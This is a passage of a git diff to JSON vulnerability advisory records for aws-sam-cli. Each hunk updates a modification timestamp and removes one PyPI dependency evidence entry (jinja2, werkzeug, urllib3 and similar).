"3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-34064.json b/advisories/BREW-aws-sam-cli-CVE-2024-34064.json index 39afcb0a45e..9f73ceee83a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-34064.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-34064", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-34069.json b/advisories/BREW-aws-sam-cli-CVE-2024-34069.json index 3a2f5fa2d5b..5a3d1c70e92 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-34069.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-34069.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-34069", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-2g68-c3qc-8985", "CVE-2024-34069", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-35195.json b/advisories/BREW-aws-sam-cli-CVE-2024-35195.json index 98baf14103f..51955172ae8 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-35195.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-35195", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-3651.json b/advisories/BREW-aws-sam-cli-CVE-2024-3651.json index 0628fe14557..340688285f0 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-3651.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-3651", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-37891.json b/advisories/BREW-aws-sam-cli-CVE-2024-37891.json index 6306b621626..ba320dec6ab 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-37891.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-37891", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-47081.json b/advisories/BREW-aws-sam-cli-CVE-2024-47081.json index 647457e3c28..2032a115717 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-47081.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-47081", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-49766.json b/advisories/BREW-aws-sam-cli-CVE-2024-49766.json index 11c261beed0..050583ef061 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-49766.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-49766.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-49766", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-f9vj-2wh5-fj8j", "CVE-2024-49766", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-49767.json b/advisories/BREW-aws-sam-cli-CVE-2024-49767.json index 12273a1f3a3..5d3e075fd19 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-49767.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-49767.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-49767", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-q34m-jh98-gwm2", "CVE-2024-49767", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-56201.json b/advisories/BREW-aws-sam-cli-CVE-2024-56201.json index 808254adeb8..208e3178fc0 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-56201.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-56201", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-56326.json b/advisories/BREW-aws-sam-cli-CVE-2024-56326.json index 8424157941b..2b8df56ce4b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-56326.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-56326", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-6345.json b/advisories/BREW-aws-sam-cli-CVE-2024-6345.json index d6112c8498d..f1ed8331559 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-6345.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-6345", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-27516.json b/advisories/BREW-aws-sam-cli-CVE-2025-27516.json index accab701f2c..59dee5a9410 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-27516.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-27516", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-3047.json b/advisories/BREW-aws-sam-cli-CVE-2025-3047.json index a0d1a6b06ae..758d032ca14 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-3047.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-3047.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-3047", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "CVE-2025-3047", "GHSA-px37-jpqx-97q9", @@ -47,13 +47,6 @@ "subject_version": "1.166.1", "key": "https://github.com/aws/aws-sam-cli" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aws-sam-cli", - "subject_version": "1.166.1", - "key": "pkg:pypi/aws-sam-cli@1.166.1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-3048.json b/advisories/BREW-aws-sam-cli-CVE-2025-3048.json index 7d3ae1b7ecd..d8f966c5797 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-3048.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-3048.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-3048", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "CVE-2025-3048", "GHSA-pp64-wj43-xqcr", @@ -47,13 +47,6 @@ "subject_version": "1.166.1", "key": "https://github.com/aws/aws-sam-cli" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aws-sam-cli", - "subject_version": "1.166.1", - "key": "pkg:pypi/aws-sam-cli@1.166.1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-47273.json b/advisories/BREW-aws-sam-cli-CVE-2025-47273.json index af0f811145e..1bd537f037e 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-47273.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-47273", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-47278.json b/advisories/BREW-aws-sam-cli-CVE-2025-47278.json index c269ee03d1f..871938c19ee 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-47278.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-47278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-47278", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-4grg-w6v8-c28g", "CVE-2025-47278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-50181.json b/advisories/BREW-aws-sam-cli-CVE-2025-50181.json index 28325f160c9..ec63ea815d4 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-50181.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-50181", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-50182.json b/advisories/BREW-aws-sam-cli-CVE-2025-50182.json index e23ea1bf0ad..ada6bf1c607 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-50182.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-50182", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-66221.json b/advisories/BREW-aws-sam-cli-CVE-2025-66221.json index 50887e2de51..67096617874 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-66221.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-66221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-66221", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hgf8-39gv-g3f2", "CVE-2025-66221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-66418.json b/advisories/BREW-aws-sam-cli-CVE-2025-66418.json index 0be1173e8a0..3fdd7c66aa4 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-66418.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-66418", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2025-66471.json b/advisories/BREW-aws-sam-cli-CVE-2025-66471.json index c3a0d17f5a0..c703c6fd68d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2025-66471.json +++ b/advisories/BREW-aws-sam-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2025-66471", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-21441.json b/advisories/BREW-aws-sam-cli-CVE-2026-21441.json index 2bccba19df1..b7c7e9ec156 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-21441.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-21441", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-21860.json b/advisories/BREW-aws-sam-cli-CVE-2026-21860.json index 993be71cee7..9bd5ba0bfe6 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-21860.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-21860.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-21860", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-87hc-h4r5-73f7", "CVE-2026-21860", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-24049.json b/advisories/BREW-aws-sam-cli-CVE-2026-24049.json index 64f49f02db5..b2ec470092a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-24049.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-24049.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-24049", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-8rrh-rw8j-w5fx", "CVE-2026-24049", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.48.0", - "key": "pkg:pypi/wheel@0.48.0", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-25645.json b/advisories/BREW-aws-sam-cli-CVE-2026-25645.json index 570c347f1cb..17d17801aae 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-25645.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-25645", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27199.json b/advisories/BREW-aws-sam-cli-CVE-2026-27199.json index 73af0a7079d..da660008701 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27199.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27199", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-29vq-49wr-vm6x", "CVE-2026-27199", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27205.json b/advisories/BREW-aws-sam-cli-CVE-2026-27205.json index 394ee2284ed..6eae4caa104 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27205.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27205", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-68rp-wp8r-4726", "CVE-2026-27205", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27448.json b/advisories/BREW-aws-sam-cli-CVE-2026-27448.json index 3c1f2704da9..56a8cff5c0b 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27448.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27448.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27448", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-vp96-hxj8-p424", "CVE-2026-27448", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-27459.json b/advisories/BREW-aws-sam-cli-CVE-2026-27459.json index 97927963713..73db984167d 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-27459.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-27459.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-27459", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5pwr-322w-8jr4", "CVE-2026-27459", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyopenssl", - "subject_version": "26.4.0", - "key": "pkg:pypi/pyopenssl@26.4.0", - "resource": "pyopenssl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-28684.json b/advisories/BREW-aws-sam-cli-CVE-2026-28684.json index 6b3d482d408..bed4b2a4213 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-28684.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-28684", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.3", - "key": "pkg:pypi/python-dotenv@1.2.3", - "resource": "python-dotenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-44431.json b/advisories/BREW-aws-sam-cli-CVE-2026-44431.json index e3b16cd47bc..357c69d1666 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-44431.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-44431", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-44432.json b/advisories/BREW-aws-sam-cli-CVE-2026-44432.json index 88cd7b61022..696db82ae5c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-44432.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-44432", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2026-4539.json b/advisories/BREW-aws-sam-cli-CVE-2026-4539.json index 135213b8ea9..f8716eb7596 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2026-4539.json +++ b/advisories/BREW-aws-sam-cli-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2026-4539", "published": 